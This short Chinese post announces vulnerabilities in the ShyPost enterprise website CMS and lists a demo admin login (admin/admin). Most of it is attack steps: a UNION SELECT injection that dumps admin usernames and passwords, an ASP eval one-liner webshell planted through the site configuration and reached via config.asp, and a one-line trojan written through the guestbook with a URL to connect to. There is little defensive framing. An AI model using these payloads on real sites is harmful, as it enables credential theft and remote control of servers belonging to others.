ShyPost企业管理系统拥有十几种模板,用户可自由选择,不同模板后台管理功能是一样的,以下 为其中一个模板的前后台测试,欢迎用户测试,
shypostShyPost企业网站管理系统 若干漏洞漏洞预警
。后台演示: http://www.shypost.com/demo/admin
测试帐号: admin 密码 admin
前台演示: http://www.shypost.com/demo
销售价格:350元/套
1、注入:
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin
拿shell:
网站配置中插入:"%><%eval request("a")%><%s="
连接 http://yoursite.com/inc/config.asp
2、写马:
留言本写入一句话,连接http://www.badguest.cn/databases/databases.asp
3、其它若干问题